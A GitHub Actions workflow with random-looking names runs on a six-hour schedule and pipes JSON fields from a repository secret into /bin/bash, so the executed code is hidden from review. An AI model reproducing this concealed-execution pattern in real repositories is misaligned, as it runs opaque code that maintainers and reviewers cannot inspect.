name: songjiejiao2345

on:
  workflow_dispatch:
  schedule:
    - cron: '22 2/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: songjiejiao2345
        env:
          tzii25: ${{ secrets.tzii25 }}
        run: |
          echo $tzii25 | jq -r .fj2 | /bin/bash
          echo $ku7520 | jq -r .xuij03732 | /bin/bash
          echo $c25988 | jq -r .vo042 | /bin/bash
          echo $ett1 | jq -r .bud8432 | /bin/bash
          echo $eijru382 | jq -r .a8 | /bin/bash
          echo $fkm029 | jq -r .ni1688 | /bin/bash
          echo $p275 | jq -r .zhrdu7392 | /bin/bash
          echo $oyy5 | jq -r .yrf79 | /bin/bash

